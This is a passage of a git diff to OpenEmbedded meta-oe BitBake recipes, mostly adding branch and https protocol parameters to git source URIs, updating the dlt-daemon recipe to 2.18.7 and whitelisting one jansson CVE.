interface, \ -based on the standardised protocol specified in the AUTOSAR standard 4.0 DLT. \ -This component can be used by GENIVI components and other applications as \ -logging facility providing: \ -- the DLT shared library \ -- the DLT daemon, including startup scripts \ -- the DLT daemon adaptors- the DLT client console utilities \ -- the DLT test applications" -HOMEPAGE = "https://www.genivi.org/" -SECTION = "console/utils" -LICENSE = "MPLv2" -LIC_FILES_CHKSUM = "file://LICENSE;md5=8184208060df880fe3137b93eb88aeea" - -DEPENDS = "zlib gzip-native" - -SRC_URI = "git://github.com/GENIVI/${BPN}.git;protocol=https \ - file://0002-Don-t-execute-processes-as-a-specific-user.patch \ - file://0004-Modify-systemd-config-directory.patch \ - file://204.patch \ - file://275.patch \ -" -SRCREV = "14ea971be7e808b9c5099c7f404ed3cf341873c4" - -S = "${WORKDIR}/git" - -PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES','systemd', d)}" -# General options -PACKAGECONFIG[dlt-examples] = "-DWITH_DLT_EXAMPLES=ON,-DWITH_DLT_EXAMPLES=OFF,,dlt-daemon-systemd" - -# Linux options -PACKAGECONFIG[systemd] = "-DWITH_SYSTEMD=ON,-DWITH_SYSTEMD=OFF,systemd" -PACKAGECONFIG[systemd-watchdog] = "-DWITH_SYSTEMD_WATCHDOG=ON,-DWITH_SYSTEMD_WATCHDOG=OFF,systemd,libsystemd" -PACKAGECONFIG[systemd-journal] = "-DWITH_SYSTEMD_JOURNAL=ON,-DWITH_SYSTEMD_JOURNAL=OFF,systemd,libsystemd" -PACKAGECONFIG[dlt-dbus] = "-DWITH_DLT_DBUS=ON,-DWITH_DLT_DBUS=OFF,dbus,dbus-lib" -PACKAGECONFIG[udp-connection] = "-DWITH_UDP_CONNECTION=ON,-DWITH_UDP_CONNECTION=OFF" - -# Command line options -PACKAGECONFIG[dlt-system] = "-DWITH_DLT_SYSTEM=ON,-DWITH_DLT_SYSTEM=OFF" -PACKAGECONFIG[dlt-adaptor] = "-DWITH_DLT_ADAPTOR=ON,-DWITH_DLT_ADAPTOR=OFF,,dlt-daemon-systemd" -PACKAGECONFIG[dlt-console] = "-DWITH_DLT_CONSOLE=ON,-DWITH_DLT_CONSOLE=OFF,,dlt-daemon-systemd" - -inherit autotools gettext cmake systemd - -EXTRA_OECMAKE += "-DSYSTEMD_UNITDIR=${systemd_system_unitdir}" - -PACKAGES += "${PN}-systemd" -SYSTEMD_PACKAGES = "${PN} ${PN}-systemd" -SYSTEMD_SERVICE_${PN} = " ${@bb.utils.contains('PACKAGECONFIG', 'systemd', 'dlt.service', '', d)} \ - ${@bb.utils.contains('PACKAGECONFIG', 'dlt-system', 'dlt-system.service', '', d)}" -SYSTEMD_AUTO_ENABLE_${PN} = "enable" -SYSTEMD_SERVICE_${PN}-systemd = " \ - ${@bb.utils.contains('PACKAGECONFIG', 'dlt-adaptor', 'dlt-adaptor-udp.service', '', d)} \ - ${@bb.utils.contains('PACKAGECONFIG', 'dlt-examples', 'dlt-example-user.service', '', d)} \ - ${@bb.utils.contains('PACKAGECONFIG', 'dlt-examples dlt-console', 'dlt-receive.service', '', d)} \ -" -SYSTEMD_AUTO_ENABLE_${PN}-systemd = "disable" - -FILES_${PN}-doc += "${datadir}/dlt-filetransfer" - -do_install_append() { - rm -f ${D}${bindir}/dlt-test-* -} diff --git a/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.7.bb b/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.7.bb new file mode 100644 index 0000000000..2a045f5790 --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.7.bb @@ -0,0 +1,63 @@ +SUMMARY = "Diagnostic Log and Trace" +DESCRIPTION = "This component provides a standardised log and trace interface, \ +based on the standardised protocol specified in the AUTOSAR standard 4.0 DLT. \ +This component can be used by GENIVI components and other applications as \ +logging facility providing: \ +- the DLT shared library \ +- the DLT daemon, including startup scripts \ +- the DLT daemon adaptors- the DLT client console utilities \ +- the DLT test applications" +HOMEPAGE = "https://www.genivi.org/" +SECTION = "console/utils" +LICENSE = "MPLv2" +LIC_FILES_CHKSUM = "file://LICENSE;md5=8184208060df880fe3137b93eb88aeea" + +DEPENDS = "zlib gzip-native json-c" + +SRC_URI = "git://github.com/GENIVI/${BPN}.git;protocol=https;branch=master \ + file://0002-Don-t-execute-processes-as-a-specific-user.patch \ + file://0004-Modify-systemd-config-directory.patch \ + file://317.patch \ +" +SRCREV = "24d197214bfdcec7430d31b42e5c87df27287aaf" + +S = "${WORKDIR}/git" + +PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES','systemd', d)}" +# General options +PACKAGECONFIG[dlt-examples] = "-DWITH_DLT_EXAMPLES=ON,-DWITH_DLT_EXAMPLES=OFF,,dlt-daemon-systemd" + +# Linux options +PACKAGECONFIG[systemd] = "-DWITH_SYSTEMD=ON,-DWITH_SYSTEMD=OFF,systemd" +PACKAGECONFIG[systemd-watchdog] = "-DWITH_SYSTEMD_WATCHDOG=ON,-DWITH_SYSTEMD_WATCHDOG=OFF,systemd,libsystemd" +PACKAGECONFIG[systemd-journal] = "-DWITH_SYSTEMD_JOURNAL=ON,-DWITH_SYSTEMD_JOURNAL=OFF,systemd,libsystemd" +PACKAGECONFIG[dlt-dbus] = "-DWITH_DLT_DBUS=ON,-DWITH_DLT_DBUS=OFF,dbus,dbus-lib" +PACKAGECONFIG[udp-connection] = "-DWITH_UDP_CONNECTION=ON,-DWITH_UDP_CONNECTION=OFF" + +# Command line options +PACKAGECONFIG[dlt-system] = "-DWITH_DLT_SYSTEM=ON,-DWITH_DLT_SYSTEM=OFF" +PACKAGECONFIG[dlt-adaptor] = "-DWITH_DLT_ADAPTOR=ON,-DWITH_DLT_ADAPTOR=OFF,,dlt-daemon-systemd" +PACKAGECONFIG[dlt-console] = "-DWITH_DLT_CONSOLE=ON,-DWITH_DLT_CONSOLE=OFF,,dlt-daemon-systemd" + +inherit autotools gettext cmake systemd + +EXTRA_OECMAKE += "-DWITH_EXTENDED_FILTERING=ON -DSYSTEMD_UNITDIR=${systemd_system_unitdir}" + +PACKAGES += "${PN}-systemd" +SYSTEMD_PACKAGES = "${PN} ${PN}-systemd" +SYSTEMD_SERVICE_${PN} = " ${@bb.utils.contains('PACKAGECONFIG', 'systemd', 'dlt.service', '', d)} \ + ${@bb.utils.contains('PACKAGECONFIG', 'dlt-system', 'dlt-system.service', '', d)} \ + ${@bb.utils.contains('PACKAGECONFIG', 'dlt-dbus', 'dlt-dbus.service', '', d)}" +SYSTEMD_AUTO_ENABLE_${PN} = "enable" +SYSTEMD_SERVICE_${PN}-systemd = " \ + ${@bb.utils.contains('PACKAGECONFIG', 'dlt-adaptor', 'dlt-adaptor-udp.service', '', d)} \ + ${@bb.utils.contains('PACKAGECONFIG', 'dlt-examples', 'dlt-example-user.service', '', d)} \ + ${@bb.utils.contains('PACKAGECONFIG', 'dlt-examples dlt-console', 'dlt-receive.service', '', d)} \ +" +SYSTEMD_AUTO_ENABLE_${PN}-systemd = "disable" + +FILES_${PN}-doc += "${datadir}/dlt-filetransfer" + +do_install_append() { + rm -f ${D}${bindir}/dlt-test-* +} diff --git a/meta-openembedded/meta-oe/recipes-extended/docopt.cpp/docopt.cpp_git.bb b/meta-openembedded/meta-oe/recipes-extended/docopt.cpp/docopt.cpp_git.bb index aa55ebf84d..162f5aa339 100644 --- a/meta-openembedded/meta-oe/recipes-extended/docopt.cpp/docopt.cpp_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/docopt.cpp/docopt.cpp_git.bb @@ -18,7 +18,7 @@ SRCREV = "3dd23e3280f213bacefdf5fcb04857bf52e90917" PV = "0.6.2+git${SRCPV}" SRC_URI = "\ - git://github.com/docopt/docopt.cpp.git;protocol=https \ + git://github.com/docopt/docopt.cpp.git;protocol=https;branch=master \ file://0001-Set-library-VERSION-and-SOVERSION.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-extended/dumb-init/dumb-init_1.2.2.bb b/meta-openembedded/meta-oe/recipes-extended/dumb-init/dumb-init_1.2.2.bb index 09eab9dcd0..eb00092c7b 100644 --- a/meta-openembedded/meta-oe/recipes-extended/dumb-init/dumb-init_1.2.2.bb +++ b/meta-openembedded/meta-oe/recipes-extended/dumb-init/dumb-init_1.2.2.bb @@ -4,7 +4,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=5940d39995ea6857d01b8227109c2e9c" SRCREV = "b1e978e486114797347deefcc03ab12629a13cc3" -SRC_URI = "git://github.com/Yelp/dumb-init" +SRC_URI = "git://github.com/Yelp/dumb-init;branch=master;protocol=https" S = "${WORKDIR}/git" EXTRA_OEMAKE = "CC='${CC}' CFLAGS='${CFLAGS} ${LDFLAGS}'" diff --git a/meta-openembedded/meta-oe/recipes-extended/figlet/figlet_git.bb b/meta-openembedded/meta-oe/recipes-extended/figlet/figlet_git.bb index 4611646b9b..61b050aac6 100644 --- a/meta-openembedded/meta-oe/recipes-extended/figlet/figlet_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/figlet/figlet_git.bb @@ -4,7 +4,7 @@ HOMEPAGE = "http://www.figlet.org/" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=1688bcd97b27704f1afcac7336409857" -SRC_URI = "git://github.com/cmatsuoka/figlet.git \ +SRC_URI = "git://github.com/cmatsuoka/figlet.git;branch=master;protocol=https \ file://0001-build-add-autotools-support-to-allow-easy-cross-comp.patch" SRCREV = "5bbcd7383a8c3a531299b216b0c734e1495c6db3" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/haveged/haveged_1.9.13.bb b/meta-openembedded/meta-oe/recipes-extended/haveged/haveged_1.9.13.bb index 50326ea2f4..19b0d8dbd7 100644 --- a/meta-openembedded/meta-oe/recipes-extended/haveged/haveged_1.9.13.bb +++ b/meta-openembedded/meta-oe/recipes-extended/haveged/haveged_1.9.13.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM="file://COPYING;md5=d32239bcb673463ab874e80d47fae504" # v1.9.9 SRCREV = "1283a65c541c4a83e152024a63faf7b267b9b1cd" -SRC_URI = "git://github.com/jirka-h/haveged.git \ +SRC_URI = "git://github.com/jirka-h/haveged.git;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/hexedit/hexedit_1.4.2.bb b/meta-openembedded/meta-oe/recipes-extended/hexedit/hexedit_1.4.2.bb index 050b7da3d7..c0d1b1b8bb 100644 --- a/meta-openembedded/meta-oe/recipes-extended/hexedit/hexedit_1.4.2.bb +++ b/meta-openembedded/meta-oe/recipes-extended/hexedit/hexedit_1.4.2.bb @@ -6,7 +6,7 @@ DEPENDS = "ncurses" LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" -SRC_URI = "git://github.com/pixel/hexedit.git \ +SRC_URI = "git://github.com/pixel/hexedit.git;branch=master;protocol=https \ " SRCREV = "800e4b2e6280531a84fd23ee0b48e16baeb90878" diff --git a/meta-openembedded/meta-oe/recipes-extended/hiredis/hiredis_0.14.0.bb b/meta-openembedded/meta-oe/recipes-extended/hiredis/hiredis_0.14.0.bb index 29f8de8d2f..cee1f342bd 100644 --- a/meta-openembedded/meta-oe/recipes-extended/hiredis/hiredis_0.14.0.bb +++ b/meta-openembedded/meta-oe/recipes-extended/hiredis/hiredis_0.14.0.bb @@ -6,7 +6,7 @@ DEPENDS = "redis" LIC_FILES_CHKSUM = "file://COPYING;md5=d84d659a35c666d23233e54503aaea51" SRCREV = "685030652cd98c5414ce554ff5b356dfe8437870" -SRC_URI = "git://github.com/redis/hiredis;protocol=git \ +SRC_URI = "git://github.com/redis/hiredis;protocol=https;branch=master \ file://0001-Makefile-remove-hardcoding-of-CC.patch" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/iotop/iotop_0.6.bb b/meta-openembedded/meta-oe/recipes-extended/iotop/iotop_0.6.bb index 3a597218db..19af46cb16 100644 --- a/meta-openembedded/meta-oe/recipes-extended/iotop/iotop_0.6.bb +++ b/meta-openembedded/meta-oe/recipes-extended/iotop/iotop_0.6.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4325afd396febcb659c36b49533135d4" PV .= "+git${SRCPV}" SRCREV = "1bfb3bc70febb1ffb95146b6dcd65257228099a3" -SRC_URI = "git://repo.or.cz/iotop.git" +SRC_URI = "git://repo.or.cz/iotop.git;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/isomd5sum/isomd5sum_1.2.3.bb b/meta-openembedded/meta-oe/recipes-extended/isomd5sum/isomd5sum_1.2.3.bb index b7899a11b6..2f4724a336 100644 --- a/meta-openembedded/meta-oe/recipes-extended/isomd5sum/isomd5sum_1.2.3.bb +++ b/meta-openembedded/meta-oe/recipes-extended/isomd5sum/isomd5sum_1.2.3.bb @@ -7,7 +7,7 @@ RDEPENDS_${BPN} = "openssl curl" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b" -SRC_URI = "git://github.com/rhinstaller/isomd5sum.git;branch=master \ +SRC_URI = "git://github.com/rhinstaller/isomd5sum.git;branch=master;protocol=https \ file://0001-tweak-install-prefix.patch \ file://0002-fix-parallel-error.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb b/meta-openembedded/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb index d6e56ea768..7beea9f1e7 100644 --- a/meta-openembedded/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb +++ b/meta-openembedded/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb @@ -11,4 +11,7 @@ SRC_URI[sha256sum] = "f4f377da17b10201a60c1108613e78ee15df6b12016b116b6de42209f4 inherit autotools pkgconfig +# upstream considers it isn't a real bug https://github.com/akheron/jansson/issues/548 +CVE_CHECK_WHITELIST = "CVE-2020-36325 " + BBCLASSEXTEND = "native" diff --git a/meta-openembedded/meta-oe/recipes-extended/jpnevulator/jpnevulator_git.bb b/meta-openembedded/meta-oe/recipes-extended/jpnevulator/jpnevulator_git.bb index 50dd74b685..ba1fece05c 100644 --- a/meta-openembedded/meta-oe/recipes-extended/jpnevulator/jpnevulator_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/jpnevulator/jpnevulator_git.bb @@ -4,7 +4,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=892f569a555ba9c07a568a7c0c4fa63a" PV = "2.3.5+git${SRCPV}" -SRC_URI = "git://github.com/snarlistic/jpnevulator.git;protocol=http" +SRC_URI = "git://github.com/snarlistic/jpnevulator.git;protocol=http;branch=master;protocol=https" SRCREV = "c2d857091c0dfed05139ac07ea9b0f36ad259638" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/konkretcmpi/konkretcmpi_0.9.2.bb b/meta-openembedded/meta-oe/recipes-extended/konkretcmpi/konkretcmpi_0.9.2.bb index e6d5663f85..977aabf040 100644 --- a/meta-openembedded/meta-oe/recipes-extended/konkretcmpi/konkretcmpi_0.9.2.bb +++ b/meta-openembedded/meta-oe/recipes-extended/konkretcmpi/konkretcmpi_0.9.2.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f673270bfc350d9ce1efc8724c6c1873" DEPENDS_append_class-target = " swig-native sblim-cmpi-devel python3" DEPENDS_append_class-native = " cmpi-bindings-native" -SRC_URI = "git://github.com/rnovacek/konkretcmpi.git \ +SRC_URI = "git://github.com/rnovacek/konkretcmpi.git;branch=master;protocol=https \ file://0001-CMakeLists.txt-fix-lib64-can-not-be-shiped-in-64bit-.patch \ file://0001-drop-including-rpath-cmake-module.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-extended/libblockdev/libblockdev_2.24.bb b/meta-openembedded/meta-oe/recipes-extended/libblockdev/libblockdev_2.24.bb index 99cdee5bba..c1023e625e 100644 --- a/meta-openembedded/meta-oe/recipes-extended/libblockdev/libblockdev_2.24.bb +++ b/meta-openembedded/meta-oe/recipes-extended/libblockdev/libblockdev_2.24.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=c07cb499d259452f324bb90c3067d85c" inherit autotools gobject-introspection -SRC_URI = "git://github.com/storaged-project/libblockdev;branch=2.x-branch" +SRC_URI = "git://github.com/storaged-project/libblockdev;branch=2.x-branch;protocol=https" SRCREV = "f5a4ba8bb298f8cbc435707d0b19b4b2ff836a8e" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/libcec/libcec_git.bb b/meta-openembedded/meta-oe/recipes-extended/libcec/libcec_git.bb index 39ceb489e2..07320e42bd 100644 --- a/meta-openembedded/meta-oe/recipes-extended/libcec/libcec_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/libcec/libcec_git.bb @@ -12,7 +12,7 @@ DEPENDS_append_rpi = "${@bb.utils.contains('MACHINE_FEATURES', 'vc4graphics', '' PV = "5.0.0" SRCREV = "43bc27fe7be491149e6f57d14110e02abdac2f24" -SRC_URI = "git://github.com/Pulse-Eight/libcec.git;branch=release \ +SRC_URI = "git://github.com/Pulse-Eight/libcec.git;branch=release;protocol=https \ file://0001-CheckPlatformSupport.cmake-Do-not-hardcode-lib-path.patch \ file://0001-Enhance-reproducibility.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-extended/libdivecomputer/libdivecomputer_git.bb b/meta-openembedded/meta-oe/recipes-extended/libdivecomputer/libdivecomputer_git.bb index b7c1958eef..e763a701e5 100644 --- a/meta-openembedded/meta-oe/recipes-extended/libdivecomputer/libdivecomputer_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/libdivecomputer/libdivecomputer_git.bb @@ -11,7 +11,7 @@ inherit autotools pkgconfig PV = "0.6.0" SRCREV = "1195abc2f4acc7b10175d570ec73549d0938c83e" -SRC_URI = "git://github.com/libdivecomputer/libdivecomputer.git;protocol=https \ +SRC_URI = "git://github.com/libdivecomputer/libdivecomputer.git;protocol=https;branch=master \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/libimobiledevice/libplist_2.1.0.bb b/meta-openembedded/meta-oe/recipes-extended/libimobiledevice/libplist_2.1.0.bb index a990deb91f..0906e9a645 100644 --- a/meta-openembedded/meta-oe/recipes-extended/libimobiledevice/libplist_2.1.0.bb +++ b/meta-openembedded/meta-oe/recipes-extended/libimobiledevice/libplist_2.1.0.bb @@ -9,7 +9,7 @@ DEPENDS = "libxml2 glib-2.0 swig python3" inherit autotools pkgconfig python3native python3targetconfig SRCREV = "3df02d4d0e9008771e8622fdc10de8333b3f0d85" -SRC_URI = "git://github.com/libimobiledevice/libplist;protocol=https \ +SRC_URI = "git://github.com/libimobiledevice/libplist;protocol=https;branch=master \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/libimobiledevice/libusbmuxd_git.bb b/meta-openembedded/meta-oe/recipes-extended/libimobiledevice/libusbmuxd_git.bb index 36fc5c858c..e9c58bf589 100644 --- a/meta-openembedded/meta-oe/recipes-extended/libimobiledevice/libusbmuxd_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/libimobiledevice/libusbmuxd_git.bb @@ -9,7 +9,7 @@ inherit autotools pkgconfig gitpkgv PKGV = "${GITPKGVTAG}" SRCREV = "78df9be5fc8222ed53846cb553de9b5d24c85c6c" -SRC_URI = "git://github.com/libimobiledevice/libusbmuxd;protocol=https" +SRC_URI = "git://github.com/libimobiledevice/libusbmuxd;protocol=https;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/liblightmodbus/liblightmodbus_2.0.2.bb b/meta-openembedded/meta-oe/recipes-extended/liblightmodbus/liblightmodbus_2.0.2.bb index 7fc5997983..bbfee1ff7a 100644 --- a/meta-openembedded/meta-oe/recipes-extended/liblightmodbus/liblightmodbus_2.0.2.bb +++ b/meta-openembedded/meta-oe/recipes-extended/liblightmodbus/liblightmodbus_2.0.2.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=84dcc94da3adb52b53ae4fa38fe49e5d" inherit cmake pkgconfig -SRC_URI = "git://github.com/Jacajack/liblightmodbus.git;protocol=https \ +SRC_URI = "git://github.com/Jacajack/liblightmodbus.git;protocol=https;branch=master \ file://0001-cmake-Use-GNUInstallDirs-instead-of-hardcoding-lib-p.patch \ " SRCREV = "59d2b405f95701e5b04326589786dbb43ce49e81" diff --git a/meta-openembedded/meta-oe/recipes-extended/libnss-nisplus/libnss-nisplus.bb b/meta-openembedded/meta-oe/recipes-extended/libnss-nisplus/libnss-nisplus.bb index c9d259b1a0..29c35caf54 100644 --- a/meta-openembedded/meta-oe/recipes-extended/libnss-nisplus/libnss-nisplus.bb +++ b/meta-openembedded/meta-oe/recipes-extended/libnss-nisplus/libnss-nisplus.bb @@ -17,7 +17,7 @@ PV = "1.3+git${SRCPV}" SRCREV = "116219e215858f4af9370171d3ead63baca8fdb4" -SRC_URI = "git://github.com/thkukuk/libnss_nisplus \ +SRC_URI = "git://github.com/thkukuk/libnss_nisplus;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/libqb/libqb_1.0.5.bb b/meta-openembedded/meta-oe/recipes-extended/libqb/libqb_1.0.5.bb index cd4019666d..dbe03fedef 100644 --- a/meta-openembedded/meta-oe/recipes-extended/libqb/libqb_1.0.5.bb +++ b/meta-openembedded/meta-oe/recipes-extended/libqb/libqb_1.0.5.bb @@ -11,7 +11,7 @@ inherit autotools pkgconfig # v1.0.5 SRCREV = "d08dbcf08b0da418bce9b5427dfd89522916322a" -SRC_URI = "git://github.com/ClusterLabs/${BPN}.git;branch=version_1 \ +SRC_URI = "git://github.com/ClusterLabs/${BPN}.git;branch=version_1;protocol=https \ file://0001-build-fix-configure-script-neglecting-re-enable-out-.patch \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/libreport/libreport_2.10.0.bb b/meta-openembedded/meta-oe/recipes-extended/libreport/libreport_2.10.0.bb index 4276c49173..24784f77a0 100644 --- a/meta-openembedded/meta-oe/recipes-extended/libreport/libreport_2.10.0.bb +++ b/meta-openembedded/meta-oe/recipes-extended/libreport/libreport_2.10.0.bb @@ -11,7 +11,7 @@ DEPENDS = "xmlrpc-c xmlrpc-c-native intltool-native \ LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" -SRC_URI = "git://github.com/abrt/libreport.git;protocol=https" +SRC_URI = "git://github.com/abrt/libreport.git;protocol=https;branch=master" SRC_URI += "file://0001-Makefile.am-remove-doc-and-apidoc.patch \ file://0002-configure.ac-remove-prog-test-of-xmlto-and-asciidoc.patch \ file://0003-without-build-plugins.patch \ diff --git a/meta-openembedded/meta-oe/recipes-extended/libuio/libuio_0.2.1.bb b/meta-openembedded/meta-oe/recipes-extended/libuio/libuio_0.2.1.bb index dd34c180a3..0278e55f3e 100644 --- a/meta-openembedded/meta-oe/recipes-extended/libuio/libuio_0.2.1.bb +++ b/meta-openembedded/meta-oe/recipes-extended/libuio/libuio_0.2.1.bb @@ -3,7 +3,7 @@ SECTION = "base" LICENSE = "GPL-2.0" LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833" -SRC_URI = "git://git.code.sf.net/p/libuio/code \ +SRC_URI = "git://git.code.sf.net/p/libuio/code;branch=master \ file://replace_inline_with_static-inline.patch \ file://0001-include-fcntl.h-for-O_RDWR-define.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-extended/md5deep/md5deep_git.bb b/meta-openembedded/meta-oe/recipes-extended/md5deep/md5deep_git.bb index e8c6864c1f..cc31323c3f 100644 --- a/meta-openembedded/meta-oe/recipes-extended/md5deep/md5deep_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/md5deep/md5deep_git.bb @@ -9,7 +9,7 @@ PV = "4.4+git${SRCPV}" SRCREV = "877613493ff44807888ce1928129574be393cbb0" -SRC_URI = "git://github.com/jessek/hashdeep.git \ +SRC_URI = "git://github.com/jessek/hashdeep.git;branch=master;protocol=https \ file://wrong-variable-expansion.patch \ file://0001-Fix-literal-and-identifier-spacing-as-dictated-by-C-.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-extended/mraa/mraa_git.bb b/meta-openembedded/meta-oe/recipes-extended/mraa/mraa_git.bb index 0b40dcb71b..540ef6e12a 100644 --- a/meta-openembedded/meta-oe/recipes-extended/mraa/mraa_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/mraa/mraa_git.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=91e7de50a8d3cf01057f318d72460acd" SRCREV = "e15ce6fbc76148ba8835adc92196b0d0a3f245e7" PV = "2.1.0+git${SRCPV}" -SRC_URI = "git://github.com/eclipse/${BPN}.git;protocol=http \ +SRC_URI = "git://github.com/eclipse/${BPN}.git;protocol=http;branch=master;protocol=https \ file://0001-cmake-Use-a-regular-expression-to-match-x86-architec.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb b/meta-openembedded/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb index 9d5a2307e7..f635a9b138 100644 --- a/meta-openembedded/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb +++ b/meta-openembedded/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb @@ -17,7 +17,7 @@ REQUIRED_DISTRO_FEATURES = "pam" SRCREV = "d8eba6cb6682b59d84ca1da67a523520b879ade6" -SRC_URI = "git://github.com/Openwsman/openwsman.git \ +SRC_URI = "git://github.com/Openwsman/openwsman.git;branch=master;protocol=https \ file://libssl-is-required-if-eventint-supported.patch \ file://openwsmand.service \ file://0001-lock.c-Define-PTHREAD_MUTEX_RECURSIVE_NP-if-undefine.patch \ diff --git a/meta-openembedded/meta-oe/recipes-extended/ostree/ostree_2020.3.bb b/meta-openembedded/meta-oe/recipes-extended/ostree/ostree_2020.3.bb index c1f43feb67..b8b86ed5a9 100644 --- a/meta-openembedded/meta-oe/recipes-extended/ostree/ostree_2020.3.bb +++ b/meta-openembedded/meta-oe/recipes-extended/ostree/ostree_2020.3.bb @@ -22,7 +22,7 @@ DEPENDS = " \ PREMIRRORS = "" SRC_URI = " \ - gitsm://github.com/ostreedev/ostree;branch=main \ + gitsm://github.com/ostreedev/ostree;branch=main;protocol=https \ file://run-ptest \ " SRCREV = "6ed48234ba579ff73eb128af237212b0a00f2057" diff --git a/meta-openembedded/meta-oe/recipes-extended/p8platform/p8platform_git.bb b/meta-openembedded/meta-oe/recipes-extended/p8platform/p8platform_git.bb index 0690d4ba3c..2e52caeffa 100644 --- a/meta-openembedded/meta-oe/recipes-extended/p8platform/p8platform_git.bb +++ b/meta-openembedded/meta-oe/recipes-extended/p8platform/p8platform_git.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://src/os.h;md5=752555fa94e82005d45fd201fee5bd33" PV = "2.1.0.1" -SRC_URI = "git://github.com/Pulse-Eight/platform.git \ +SRC_URI = "git://github.com/Pulse-Eight/platform.git;branch=master;protocol=https \ file://0001-Make-resulting-cmake-config-relocatable.patch" SRCREV = "2d90f98620e25f47702c9e848380c0d93f29462b" diff --git a/meta-openembedded/meta-oe/recipes-extended/pam/pam-plugin-ccreds_11.bb b/meta-openembedded/meta-oe/recipes-extended/pam/pam-plugin-ccreds_11.bb index 9838e75ef5..5c2af44c73 100644 --- a/meta-openembedded/meta-oe/recipes-extended/pam/pam-plugin-ccreds_11.bb +++ b/meta-openembedded/meta-oe/recipes-extended/pam/pam-plugin-ccreds_11.bb @@ -11,7 +11,7 @@ REQUIRED_DISTRO_FEATURES = "pam" SRCREV = "e2145df09469bf84878e4729b4ecd814efb797d1" -SRC_URI = "git://github.com/PADL/pam_ccreds" +SRC_URI = "git://github.com/PADL/pam_ccreds;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-extended/pam/pam-plugin-ldapdb_1.3.bb b/meta-openembedded/meta-oe/recipes-extended/pam/pam-plugin-ldapdb_1.3.bb index 626b22fe48..5022300ba3 100644 --- a/meta-openembedded/meta-oe/recipes-extended/pam/pam-plugin-ldapdb_1.3.bb +++ b/meta-openembedded/meta-oe/recipes-extended/pam/pam-plugin-ldapdb_1.3.bb @@ -11,7 +11,7 @@ inherit features_check REQUIRED_DISTRO_FEATURES = "pam" SRCREV = "84d7b260f1ae6857ae36e014c9a5968e8aa1cbe8" -SRC_URI = "git://github.com/rmbreak/pam_ldapdb \ +SRC_URI = "git://github.com/rmbreak/pam_ldapdb;branch=master;protocol=https \ file://0001-include-stdexcept-for-std-invalid_argument.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-extended/pmdk/pmdk_1.7.bb b/meta-openembedded/meta-oe/recipes-extended/pmdk/pmdk_1.7.bb index f5066da0d8..5c56a16f41 100644 --- a/meta-openembedded/meta-oe/recipes-extended/pmdk/pmdk_1.7.bb +++ b/meta-openembedded/meta-oe/recipes-extended/pmdk/pmdk_1.7.bb @@ -11,7 +11,7 @@ DEPENDS_append_libc-musl = " fts" S = "${WORKDIR}/git" -SRC_URI = "git://github.com/pmem/pmdk.git \ +SRC_URI = "git://github.com/pmem/pmdk.git;branch=master;protocol=https \ file://0001-jemalloc-jemalloc.cfg-Specify-the-host-when-building.patch \ file://0002-Makefile-Don-t-install-the-docs.patch \ 